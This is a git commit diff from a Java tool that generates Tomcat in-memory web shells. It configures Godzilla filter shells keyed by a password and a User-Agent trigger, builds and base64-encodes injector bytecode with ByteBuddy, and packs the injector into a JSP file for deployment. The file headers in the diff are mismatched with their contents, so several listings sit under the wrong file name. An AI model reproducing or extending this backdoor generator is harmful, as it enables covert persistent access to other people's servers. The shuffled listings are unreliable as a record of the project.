feat: support tomcat cmd shell and jsp packer

Author: ReaJason

generator/src/main/java/com/reajason/javaweb/GeneratorMain.java

@@ -0,0 +1,55 @@
+package com.reajason.javaweb;
+
+import com.reajason.javaweb.config.*;
+import com.reajason.javaweb.memsell.packer.JspPacker;
+import com.reajason.javaweb.memsell.tomcat.TomcatShell;
+
+import java.io.IOException;
+import java.nio.file.Files;
+import java.nio.file.Paths;
+
+/**
+ * @author ReaJason
+ * @since 2024/11/24
+ */
+public class GeneratorMain {
+    public static void main(String[] args) throws IOException {
+        Server server = Server.TOMCAT;
+        ShellTool shellTool = ShellTool.Godzilla;
+        String shellType = TomcatShell.FILTER;
+        GodzillaShellConfig shellConfig = GodzillaShellConfig.builder()
+                .pass("pass")
+                .key("key")
+                .headerName("User-Agent")
+                .headerValue("test")
+                .build();
+        GenerateResult generateResult = generate(server, shellTool, shellType, shellConfig);
+        if (generateResult != null) {
+            String shellBytesBase64Str = generateResult.getShellBytesBase64Str();
+            String injectorBytesBase64Str = generateResult.getInjectorBytesBase64Str();
+            Files.write(Paths.get(shellConfig.getShellClassName() + ".class"), generateResult.getShellBytes());
+            System.out.println(shellConfig.getShellClassName() + " : " + shellBytesBase64Str);
+            System.out.println(shellConfig.getInjectorClassName() + " : " + injectorBytesBase64Str);
+            System.out.println(shellConfig);
+            JspPacker jspPacker = new JspPacker();
+            String jspContent = new String(jspPacker.pack(generateResult));
+            System.out.println(jspContent);
+        }
+    }
+
+    public static GenerateResult generate(Server server, ShellTool shellTool, String shellType, ShellConfig shellConfig) {
+        switch (server) {
+            case TOMCAT:
+                return TomcatShell.generate(shellTool, shellType, shellConfig);
+            case BES:
+                break;
+            case RESIN:
+                break;
+            case JETTY:
+                break;
+            default:
+                throw new IllegalArgumentException("Unsupported server");
+        }
+        return GenerateResult.builder().build();
+    }
+}

generator/src/main/java/com/reajason/javaweb/config/CommandShellConfig.java

@@ -0,0 +1,18 @@
+package com.reajason.javaweb.config;
+
+import lombok.Builder;
+import lombok.Getter;
+import lombok.ToString;
+import lombok.experimental.SuperBuilder;
+
+/**
+ * @author ReaJason
+ * @since 2024/11/24
+ */
+@Getter
+@SuperBuilder
+@ToString
+public class CommandShellConfig extends ShellConfig {
+    @Builder.Default
+    private String headerName = "cmd";
+}

generator/src/main/java/com/reajason/javaweb/config/GenerateResult.java

@@ -0,0 +1,27 @@
+package com.reajason.javaweb.config;
+
+import lombok.Builder;
+import lombok.Data;
+import org.apache.commons.codec.binary.Base64;
+
+/**
+ * @author ReaJason
+ * @since 2024/11/24
+ */
+@Data
+@Builder
+public class GenerateResult {
+    private String shellClassName;
+    private transient byte[] shellBytes;
+    private String shellBytesBase64Str;
+    private String injectorClassName;
+    private transient byte[] injectorBytes;
+    private String injectorBytesBase64Str;
+    private ShellConfig shellConfig;
+
+    public GenerateResult encodeBase64() {
+        this.shellBytesBase64Str = Base64.encodeBase64String(shellBytes);
+        this.injectorBytesBase64Str = Base64.encodeBase64String(injectorBytes);
+        return this;
+    }
+}

generator/src/main/java/com/reajason/javaweb/config/GodzillaShellConfig.java

@@ -0,0 +1,25 @@
+package com.reajason.javaweb.config;
+
+import com.reajason.javaweb.util.CommonUtil;
+import lombok.*;
+import lombok.experimental.SuperBuilder;
+
+/**
+ * @author ReaJason
+ * @since 2024/11/24
+ */
+@Getter
+@SuperBuilder
+@NoArgsConstructor
+@AllArgsConstructor
+@ToString
+public class GodzillaShellConfig extends ShellConfig {
+    @Builder.Default
+    private String pass = "pass";
+    @Builder.Default
+    private String key = "key";
+    @Builder.Default
+    private String headerName = "User-Agent";
+    @Builder.Default
+    private String headerValue = CommonUtil.getRandomString(8);
+}

generator/src/main/java/com/reajason/javaweb/config/ShellConfig.java

@@ -0,0 +1,25 @@
+package com.reajason.javaweb.config;
+
+import com.reajason.javaweb.util.CommonUtil;
+import lombok.AllArgsConstructor;
+import lombok.Builder;
+import lombok.Data;
+import lombok.NoArgsConstructor;
+import lombok.experimental.SuperBuilder;
+
+/**
+ * @author ReaJason
+ * @since 2024/11/24
+ */
+@Data
+@SuperBuilder
+@NoArgsConstructor
+@AllArgsConstructor
+public class ShellConfig {
+    @Builder.Default
+    private String shellClassName = CommonUtil.generateShellClassName();
+    @Builder.Default
+    private String injectorClassName = CommonUtil.generateInjectorClassName();
+    @Builder.Default
+    private String urlPattern = "/*";
+}

generator/src/main/java/com/reajason/javaweb/config/TomcatShell.java

@@ -0,0 +1,28 @@
+package com.reajason.javaweb.memsell;
+
+import net.bytebuddy.ByteBuddy;
+import net.bytebuddy.dynamic.DynamicType;
+import net.bytebuddy.implementation.FieldAccessor;
+import net.bytebuddy.implementation.Implementation;
+import net.bytebuddy.implementation.SuperMethodCall;
+import net.bytebuddy.matcher.ElementMatchers;
+
+/**
+ * @author ReaJason
+ * @since 2024/11/24
+ */
+public class CommandGenerator {
+
+    public static byte[] generate(Class<?> commandClass, String commandClassName, String headerName) {
+        Implementation.Composable fieldSets = SuperMethodCall.INSTANCE
+                .andThen(FieldAccessor.ofField("headerName").setsValue(headerName));
+        try (DynamicType.Unloaded<?> make = new ByteBuddy()
+                .redefine(commandClass)
+                .name(commandClassName)
+                .constructor(ElementMatchers.any())
+                .intercept(fieldSets)
+                .make()) {
+            return make.getBytes();
+        }
+    }
+}

generator/src/main/java/com/reajason/javaweb/memsell/CommandGenerator.java

@@ -14,7 +14,7 @@
  */
 public class GodzillaGenerator {
 
-    public byte[] generate(Class<?> godzillaClass, String godzillaClassName,
+    public static byte[] generate(Class<?> godzillaClass, String godzillaClassName,
                            String pass, String key,
                            String headerName, String headerValue) {
         String md5Key = DigestUtils.md5Hex(key).substring(0, 16);

generator/src/main/java/com/reajason/javaweb/memsell/GodzillaGenerator.java

@@ -6,7 +6,6 @@
 import net.bytebuddy.dynamic.DynamicType;
 import net.bytebuddy.implementation.FixedValue;
 import org.apache.commons.codec.binary.Base64;
-import org.apache.commons.lang3.StringUtils;
 
 import java.util.Objects;
 
@@ -19,7 +18,7 @@
 public class InjectorGenerator {
 
     @SneakyThrows
-    public byte[] generate(Class<?> injectClass, String injectClassName, String shellClassName, byte[] shellBytes, String urlPattern) {
+    public static byte[] generate(Class<?> injectClass, String injectClassName, String shellClassName, byte[] shellBytes, String urlPattern) {
         String base64String = Base64.encodeBase64String(CommonUtil.gzipCompress(shellBytes)).replace(System.lineSeparator(), "");;
         try (DynamicType.Unloaded<?> make = new ByteBuddy()
                 .redefine(injectClass)

generator/src/main/java/com/reajason/javaweb/memsell/InjectorGenerator.java

@@ -0,0 +1,24 @@
+package com.reajason.javaweb.memsell.packer;
+
+import com.reajason.javaweb.config.GenerateResult;
+import lombok.SneakyThrows;
+import org.apache.commons.io.IOUtils;
+
+import java.nio.charset.Charset;
+import java.util.Objects;
+
+/**
+ * @author ReaJason
+ * @since 2024/11/26
+ */
+public class JspPacker implements Packer {
+
+    @Override
+    @SneakyThrows
+    public byte[] pack(GenerateResult generateResult) {
+        String injectorBytesBase64Str = generateResult.getInjectorBytesBase64Str();
+        String injectorClassName = generateResult.getInjectorClassName();
+        String jspTemplate = IOUtils.toString(Objects.requireNonNull(this.getClass().getResourceAsStream("/shell.jsp")), Charset.defaultCharset());
+        return jspTemplate.replace("{{className}}", injectorClassName).replace("{{base64Str}}", injectorBytesBase64Str).getBytes();
+    }
+}